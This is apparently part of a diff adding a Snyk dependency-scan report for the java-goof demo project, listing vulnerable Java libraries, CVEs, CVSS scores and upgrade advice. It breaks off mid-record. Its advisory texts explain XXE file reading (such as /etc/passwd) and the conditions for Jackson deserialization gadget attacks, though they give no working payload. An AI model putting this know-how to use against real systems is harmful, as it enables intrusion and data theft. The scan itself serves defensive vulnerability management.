"com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "vulns": [ + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573" + ] + }, + "commons-collections:commons-collections@3.1": { + "upgradeTo": "commons-collections:commons-collections@3.2.2", + "upgrades": [ + "commons-collections:commons-collections@3.1", + "commons-collections:commons-collections@3.1", + "commons-collections:commons-collections@3.1" + ], + "vulns": [ + "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "SNYK-JAVA-COMMONSCOLLECTIONS-6056408" + ] + }, + "org.hibernate:hibernate-validator@4.3.1.Final": { + "upgradeTo": "org.hibernate:hibernate-validator@6.0.23.Final", + "upgrades": [ + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "vulns": [ + "SNYK-JAVA-ORGHIBERNATE-30098", + "SNYK-JAVA-ORGHIBERNATE-568162", + "SNYK-JAVA-ORGHIBERNATE-569100" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 99, + "projectName": "io.github.snyk:todolist-web-common", + "foundProjectCount": 7, + "displayTargetFile": "todolist-goof/todolist-web-common/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", + "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + 